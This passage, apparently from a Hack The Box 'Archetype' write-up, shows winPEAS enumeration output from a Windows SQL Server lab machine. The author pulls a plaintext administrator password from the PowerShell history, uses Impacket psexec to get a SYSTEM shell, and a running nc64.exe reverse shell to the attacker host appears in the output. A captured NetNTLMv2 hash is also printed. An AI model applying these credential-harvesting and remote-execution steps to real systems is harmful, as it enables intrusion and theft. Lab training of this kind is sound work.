NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
Promiser SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAVC.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi Corportation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SmartSAMD.sys
QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qefcoe.sys
QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxois.sys
QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxfcoe.sys
VMware Pointing USB Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmusbmouse.sys
VMware Pointing PS/2 Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp_loader.sys
VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
VMware PCIe Ethernet Adapter NDIS 6.30 (64-bit) - 1.8.17.0 build-17274505 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmxnet3.sys
VMware server memory controller - 7.5.5.0 build-14903665 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys
════════════════════════════════════╣ Network Information (T1016,T1049,T1135,T1046,T1018,T1090) ╠════════════════════════════════════
╔══════════╣ Network Shares (T1135)
ADMIN$ (Path: C:\Windows)
backups (Path: C:\backups)
C$ (Path: C:\)
IPC$ (Path: )
╔══════════╣ Enumerate Network Mapped Drives (WMI) (T1135)
Local Name : T:
Remote Name : \\Archetype\backups
Remote Path : \\Archetype\backups
Status : Unavailable
Connection State : Disconnected
Persistent : True
UserName :
Description : RESOURCE REMEMBERED - Microsoft Windows Network
=================================================================================================
╔══════════╣ Host File (T1016)
╔══════════╣ Network Ifaces and known hosts (T1016,T1018)
╚ The masks are only for the IPv4 addresses
Ethernet0 2[00:50:56:B0:58:DF]: 10.129.16.27, fe80::f874:cc93:fb7d:2d23%7, dead:beef::f874:cc93:fb7d:2d23 / 255.255.0.0
Gateways: 10.129.0.1, fe80::250:56ff:feb0:b068%7
DNSs: 1.1.1.1, 1.0.0.1
Known hosts:
10.129.0.1 00-50-56-B0-B0-68 Dynamic
10.129.1.66 00-50-56-B0-31-5B Dynamic
10.129.16.9 00-50-56-B0-48-05 Dynamic
10.129.16.49 00-50-56-B0-D8-05 Dynamic
10.129.16.71 00-50-56-B0-35-DF Dynamic
10.129.16.72 00-50-56-B0-69-6F Dynamic
10.129.16.74 00-50-56-B0-7B-E7 Dynamic
10.129.22.81 00-50-56-B0-D3-A2 Dynamic
10.129.37.196 00-50-56-B0-15-A7 Dynamic
10.129.95.187 00-50-56-B0-05-CB Dynamic
10.129.136.222 00-50-56-B0-80-7A Dynamic
10.129.232.140 00-50-56-B0-09-37 Dynamic
10.129.255.255 FF-FF-FF-FF-FF-FF Static
169.254.5.240 00-50-56-B0-7B-E7 Dynamic
169.254.14.253 00-50-56-B0-D8-05 Dynamic
169.254.117.94 00-50-56-B0-69-6F Dynamic
169.254.169.254 00-00-00-00-00-00 Invalid
169.254.232.31 00-50-56-B0-35-DF Dynamic
169.254.255.255 00-00-00-00-00-00 Invalid
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
255.255.255.255 FF-FF-FF-FF-FF-FF Static
Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Known hosts:
224.0.0.22 00-00-00-00-00-00 Static
╔══════════╣ Current TCP Listening Ports (T1049)
╚ Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 135 0.0.0.0 0 Listening 848 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 1433 0.0.0.0 0 Listening 1784 C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 464 wininit
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 952 svchost
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 992 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 1172 svchost
TCP 0.0.0.0 49668 0.0.0.0 0 Listening 604 services
TCP 0.0.0.0 49669 0.0.0.0 0 Listening 624 lsass
TCP 10.129.16.27 139 0.0.0.0 0 Listening 4 System
TCP 10.129.16.27 1433 10.10.16.155 51560 Established 1784 C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP 10.129.16.27 49678 10.10.16.155 443 Established 1972 C:\Users\sql_svc\Downloads\nc64.exe
TCP 127.0.0.1 1434 0.0.0.0 0 Listening 1784 C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP [::] 135 [::] 0 Listening 848 svchost
TCP [::] 445 [::] 0 Listening 4 System
TCP [::] 1433 [::] 0 Listening 1784 C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP [::] 5985 [::] 0 Listening 4 System
TCP [::] 47001 [::] 0 Listening 4 System
TCP [::] 49664 [::] 0 Listening 464 wininit
TCP [::] 49665 [::] 0 Listening 952 svchost
TCP [::] 49666 [::] 0 Listening 992 svchost
TCP [::] 49667 [::] 0 Listening 1172 svchost
TCP [::] 49668 [::] 0 Listening 604 services
TCP [::] 49669 [::] 0 Listening 624 lsass
TCP [::1] 1434 [::] 0 Listening 1784 C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP [fe80::f874:cc93:fb7d:2d23%7] 445 [fe80::f874:cc93:fb7d:2d23%7] 49681 Established 4 System
TCP [fe80::f874:cc93:fb7d:2d23%7] 49681 [fe80::f874:cc93:fb7d:2d23%7] 445 Established 4 System
╔══════════╣ Current UDP Listening Ports (T1049)
╚ Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP 0.0.0.0 123 *:* 1376 svchost
UDP 0.0.0.0 500 *:* 992 svchost
UDP 0.0.0.0 4500 *:* 992 svchost
UDP 0.0.0.0 5353 *:* 460 svchost
UDP 0.0.0.0 5355 *:* 460 svchost
UDP 10.129.16.27 137 *:* 4 System
UDP 10.129.16.27 138 *:* 4 System
UDP 127.0.0.1 61096 *:* 992 svchost
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP [::] 123 *:* 1376 svchost
UDP [::] 500 *:* 992 svchost
UDP [::] 4500 *:* 992 svchost
UDP [::] 5353 *:* 460 svchost
UDP [::] 5355 *:* 460 svchost
╔══════════╣ Firewall Rules (T1016)
╚ Showing only DENY rules (too many ALLOW rules always)
Current Profiles: PUBLIC
FirewallEnabled (Domain): False
FirewallEnabled (Private): False
FirewallEnabled (Public): False
DENY rules:
╔══════════╣ DNS cached --limit 70-- (T1016)
Entry Name Data
╔══════════╣ Enumerating Internet settings, zone and proxy configuration (T1090)
General Settings
Hive Key Value
HKCU DisableCachingOfSSLPages 0
HKCU IE5_UA_Backup_Flag 5.0
HKCU PrivacyAdvanced 1
HKCU SecureProtocols 2688
HKCU User Agent Mozilla/4.0 (compatible; MSIE 8.0; Win32)
HKCU CertificateRevocation 1
HKCU ZonesSecurityUpgrade System.Byte[]
HKLM EnablePunycode 1
Zone Maps
No URLs configured
Zone Auth Settings
No Zone Auth Settings
╔══════════╣ Internet Connectivity (T1016)
╚ Checking if internet access is possible via different methods
HTTP (80) Access: Not Accessible
[X] Exception: Error: A task was canceled.
HTTPS (443) Access: Not Accessible
[X] Exception: Error: TCP connect timed out
HTTPS (443) Access by Domain Name: Not Accessible
[X] Exception: Error: A task was canceled.
DNS (53) Access: Not Accessible
[X] Exception: Error: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond
ICMP (ping) Access: Not Accessible
[X] Exception: Error: Ping failed: TimedOut
╔══════════╣ Hostname Resolution (T1016)
╚ Checking if the hostname can be resolved externally
[X] Exception: Error during hostname check: An error occurred while sending the request.
════════════════════════════════════╣ Active Directory Quick Checks (T1018,T1087.002,T1558.003,T1484.001,T1649,T1003) ╠════════════════════════════════════
╔══════════╣ gMSA readable managed passwords (T1003)
╚ Look for Group Managed Service Accounts you can read (msDS-ManagedPassword) https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/gmsa.html
[-] Host is not domain-joined. Skipping.
╔══════════╣ Kerberoasting / service ticket risks (T1558.003)
╚ Enumerate weak SPN accounts and legacy Kerberos crypto https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/kerberoast.html
[-] Host is not domain-joined. Skipping.
╔══════════╣ AD object control surfaces (T1484.001,T1087.002,T1018)
╚ Look for objects where you have GenericAll/GenericWrite/attribute rights for ACL abuse (password reset, SPN/UAC/RBCD, sidHistory, delegation, DCSync). https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html#acl-abuse
[-] Host is not domain-joined. Skipping.
╔══════════╣ AD CS misconfigurations for ESC (T1649)
╚ https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates.html
[-] Host is not domain-joined. Skipping.
════════════════════════════════════╣ Cloud Information (T1552.005,T1580) ╠════════════════════════════════════
Learn and practice cloud hacking in training.hacktricks.xyz
AWS EC2? No
Azure VM? No
Azure Tokens? No
Google Cloud Platform? No
Google Workspace Joined? No
Google Cloud Directory Sync? No
Google Password Sync? No
════════════════════════════════════╣ Windows Credentials (T1552.001,T1552.002,T1555.003,T1555.004,T1558,T1547.005,T1563.002) ╠════════════════════════════════════
╔══════════╣ Checking Windows Vault (T1555.004)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
Not Found
╔══════════╣ Checking Credential manager (T1555.004)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): Element not found'
Please run:
cmdkey /list
╔══════════╣ Saved RDP connections (T1552.002)
Not Found
╔══════════╣ Remote Desktop Server/Client Settings (T1563.002)
RDP Server Settings
Network Level Authentication :
Block Clipboard Redirection :
Block COM Port Redirection :
Block Drive Redirection :
Block LPT Port Redirection :
Block PnP Device Redirection :
Block Printer Redirection :
Allow Smart Card Redirection :
RDP Client Settings
Disable Password Saving : True
Restricted Remote Administration : False
╔══════════╣ Recently run commands (T1552.002)
Not Found
╔══════════╣ Checking for DPAPI Master Keys (T1555.003)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\27dd4b67-e6ce-43d7-8c13-0a1f91fb3aca
Accessed: 3/11/2026 7:43:44 PM
Modified: 3/11/2026 7:43:44 PM
=================================================================================================
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\6fc21731-a2de-4f1a-aeeb-ed5c000f18ca
Accessed: 1/19/2020 3:10:06 PM
Modified: 1/19/2020 3:10:06 PM
=================================================================================================
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\9f851a43-e6fe-4ab5-9be0-c931324190ab
Accessed: 7/26/2021 9:14:39 AM
Modified: 7/26/2021 9:14:39 AM
=================================================================================================
╔══════════╣ Checking for DPAPI Credential Files (T1555.003)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
Not Found
╔══════════╣ Checking for RDCMan Settings Files (T1552.001)
╚ Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager
Not Found
╔══════════╣ Looking for Kerberos tickets (T1558)
╚ https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html
Not Found
╔══════════╣ Looking for saved Wifi credentials (T1552.001)
[X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found
╔══════════╣ Looking AppCmd.exe (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
Not Found
You must be an administrator to run this check
╔══════════╣ Looking SSClient.exe (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#scclient--sccm
Not Found
╔══════════╣ Enumerating SSCM - System Center Configuration Manager settings (T1552.001)
╔══════════╣ Enumerating Security Packages Credentials (T1547.005)
Version: NetNTLMv2
Hash: sql_svc::ARCHETYPE:1122334455667788:0406872ee7f043504006f7c8a553023b:01010000000000001a2bc6d5e0b1dc01285fee503745c0ec00000000080030003000000000000000000000000030000019c5c7039695c74a0ba780ff9c23980a39faa98bcd17c1aad8685d2ca3a019290a00100000000000000000000000000000000000090000000000000000000000
=================================================================================================
════════════════════════════════════╣ Registry permissions for hive exploitation (T1012,T1574.011,T1056.001) ╠════════════════════════════════════
╔══════════╣ Cross-user TypingInsights key (HKCU/HKU) (T1056.001)
[-] TypingInsights key does not grant write access to low-privileged groups.
╔══════════╣ Known HKLM descendants writable by standard users (T1574.011)
[!] HKLM\SOFTWARE\Microsoft\Tracing -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
╔══════════╣ Sample of additional writable HKLM keys (depth-limited scan) (T1574.011)
[!] HKLM\SOFTWARE\Microsoft\InputMethod\Chs\DuState -> BUILTIN\Users (S-1-5-32-545) (WriteKey)
[!] HKLM\SOFTWARE\Microsoft\InputMethod\Cht\DuState -> BUILTIN\Users (S-1-5-32-545) (WriteKey)
[!] HKLM\SOFTWARE\Microsoft\SQMClient\CommonUploader\Paths -> BUILTIN\Users (S-1-5-32-545) (CreateSubKey)
[!] HKLM\SOFTWARE\Microsoft\Tracing -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SOFTWARE\Microsoft\Tracing\MPRAPI -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock -> Interactive (S-1-5-4) (WriteKey)
[!] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess -> BUILTIN\Users (S-1-5-32-545) (SetValue)
[!] HKLM\SOFTWARE\Microsoft\WindowsUpdate\UpdatePolicy\Settings -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SOFTWARE\WOW6432Node\Microsoft\SQMClient\CommonUploader\Paths -> BUILTIN\Users (S-1-5-32-545) (CreateSubKey)
[!] HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SOFTWARE\WOW6432Node\Microsoft\WindowsUpdate\UpdatePolicy\Settings -> BUILTIN\Users (S-1-5-32-545) (WriteKey, GenericWrite)
[!] HKLM\SYSTEM\CurrentControlSet\Services\vds\Alignment -> Authenticated Users (S-1-5-11) (CreateSubKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\26 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\4 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a01-9b1a-11d4-9123-0050047759bc}\25 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a01-9b1a-11d4-9123-0050047759bc}\26 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a01-9b1a-11d4-9123-0050047759bc}\4 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\CurrentControlSet\Control\Nsi\{eb004a1c-9b1a-11d4-9123-0050047759bc}\0 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings -> BUILTIN\Users (S-1-5-32-545) (GenericWrite, WriteKey)
[!] HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\26 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\4 -> Everyone (S-1-1-0) (WriteKey)
[!] HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a01-9b1a-11d4-9123-0050047759bc}\25 -> Everyone (S-1-1-0) (WriteKey)
[*] Showing up to 25 entries from the sampled paths to avoid noisy output.
════════════════════════════════════╣ Browsers Information (T1217,T1539,T1555.003) ╠════════════════════════════════════
╔══════════╣ Showing saved credentials for Firefox
Info: if no credentials were listed, you might need to close the browser and try again.
╔══════════╣ Looking for Firefox DBs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found
╔══════════╣ Looking for GET credentials in Firefox history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found
╔══════════╣ Showing saved credentials for Chrome
Info: if no credentials were listed, you might need to close the browser and try again.
╔══════════╣ Looking for Chrome DBs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found
╔══════════╣ Looking for GET credentials in Chrome history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found
╔══════════╣ Chrome bookmarks
Not Found
╔══════════╣ Showing saved credentials for Opera
Info: if no credentials were listed, you might need to close the browser and try again.
╔══════════╣ Showing saved credentials for Brave Browser
Info: if no credentials were listed, you might need to close the browser and try again.
╔══════════╣ Showing saved credentials for Internet Explorer (unsupported)
Info: if no credentials were listed, you might need to close the browser and try again.
╔══════════╣ Current IE tabs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
[X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG))
--- End of inner exception stack trace ---
at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()
Not Found
╔══════════╣ Looking for GET credentials in IE history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found
╔══════════╣ IE favorites
Not Found
════════════════════════════════════╣ Interesting files and registry (T1083,T1552.001,T1552.002,T1552.004,T1552.006,T1003.002,T1564.001,T1574.001,T1059.004,T1114.001,T1218,T1649) ╠════════════════════════════════════
╔══════════╣ Putty Sessions
Not Found
╔══════════╣ Putty SSH Host keys
Not Found
╔══════════╣ SSH keys in registry
╚ If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#ssh-keys-in-registry
Not Found
╔══════════╣ SuperPutty configuration files
╔══════════╣ Enumerating Office 365 endpoints synced by OneDrive.
(T1083)
SID: S-1-5-19
=================================================================================================
SID: S-1-5-20
=================================================================================================
SID: S-1-5-21-1479773013-2644727484-962428355-1001
=================================================================================================
SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
=================================================================================================
SID: S-1-5-18
=================================================================================================
╔══════════╣ Cloud Credentials (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Not Found
╔══════════╣ Unattend Files (T1552.001)
╔══════════╣ Looking for common SAM & SYSTEM backups (T1003.002)
╔══════════╣ Looking for McAfee Sitelist.xml Files (T1552.001)
╔══════════╣ Cached GPP Passwords (T1552.006)
╔══════════╣ Looking for possible regs with creds (T1552.002)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#inside-the-registry
Not Found
Not Found
Not Found
Not Found
╔══════════╣ Looking for possible password files in users homes (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
╔══════════╣ Searching for Oracle SQL Developer config files
(T1552.001)
╔══════════╣ Slack files & directories
note: check manually if something is found
╔══════════╣ Looking for LOL Binaries and Scripts (can be slow) (T1218)
╚ https://lolbas-project.github.io/
[!] Check skipped, if you want to run it, please specify '-lolbas' argument
╔══════════╣ Enumerating Outlook download files
(T1114.001)
╔══════════╣ Enumerating machine and user certificate files
(T1649,T1552.004)
╔══════════╣ Searching known files that can contain creds in home (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
╔══════════╣ Looking for documents --limit 100-- (T1083)
Not Found
╔══════════╣ Office Most Recent Files -- limit 50
(T1083)
Last Access Date User Application Document
╔══════════╣ Recent files --limit 70-- (T1083)
Not Found
╔══════════╣ Looking inside the Recycle Bin for creds files (T1552.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Not Found
╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow)
(T1564.001)
C:\Users\Default
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
╔══════════╣ Searching interesting files in other users home directories (can be slow)
(T1552.001)
Checking folder: c:\users\administrator
=================================================================================================
╔══════════╣ Searching executable files in non-default folders with write (equivalent) permissions (can be slow) (T1574.001)
File Permissions "C:\Users\sql_svc\Downloads\winPEASx64.exe": sql_svc [Allow: AllAccess]
File Permissions "C:\Users\sql_svc\Downloads\nc64.exe": sql_svc [Allow: AllAccess]
╔══════════╣ Looking for Linux shells/distributions - wsl.exe, bash.exe (T1059.004)
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
| --------------------------------------------------------------------------------- |
| Learn Cloud Hacking : training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
| --------------------------------------------------------------------------------- |
| Thank you! |
\---------------------------------------------------------------------------------/
PS C:\Users\sql_svc\Downloads>There’s a lot of outputs, but I found a PowerShell history file ConsoleHost_history.txt, which contains all PowerShell commands from all users execute.
╔══════════╣ PowerShell Settings (T1059.001)
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79BLet’s change into that directory
PS C:\Users\sql_svc\Downloads> cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
PS C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
ls
Directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/17/2020 2:36 AM 79 ConsoleHost_history.txt
PS C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
cat ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>As we can see we found another credential of MSSQL Server that stored in Powershell history file, which is administrator credential.
administrator:MEGACORP_4dm1n!!
Let’s now remote it again with that creds
Open a new terminal and use psexec.py from the Impacket module to execute commands on the Windows machine. Make sure type the password.
nopedawn@npdn ~/L/H/S/Archetype> python3 psexec.py administrator@10.129.16.27
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.129.16.27.....
[*] Found writable share ADMIN$
[*] Uploading file WuhAmGzA.exe
[*] Opening SVCManager on 10.129.16.27.....
[*] Creating service IBfP on 10.129.16.27.....
[*] Starting service IBfP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Finally we got another cmd-shell working in root,
C:\Windows\system32> dir ..\..\Users
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users
01/19/2020 04:10 PM <DIR> .
01/19/2020 04:10 PM <DIR> ..
01/19/2020 11:39 PM <DIR> Administrator
01/19/2020 11:39 PM <DIR> Public
01/20/2020 06:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,702,352,384 bytes free
C:\Windows\system32> dir ..\..\Users\Administrator
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator
01/19/2020 11:39 PM <DIR> .
01/19/2020 11:39 PM <DIR> ..
07/27/2021 02:30 AM <DIR> 3D Objects
07/27/2021 02:30 AM <DIR> Contacts
07/27/2021 02:30 AM <DIR> Desktop
07/27/2021 02:30 AM <DIR> Documents
07/27/2021 02:30 AM <DIR> Downloads
07/27/2021 02:30 AM <DIR> Favorites
07/27/2021 02:30 AM <DIR> Links
07/27/2021 02:30 AM <DIR> Music
07/27/2021 02:30 AM <DIR> Pictures
07/27/2021 02:30 AM <DIR> Saved Games
07/27/2021 02:30 AM <DIR> Searches
07/27/2021 02:30 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 10,702,352,384 bytes free
C:\Windows\system32> dir ..\..\Users\Administrator\Desktop
Volume in drive C has no label.
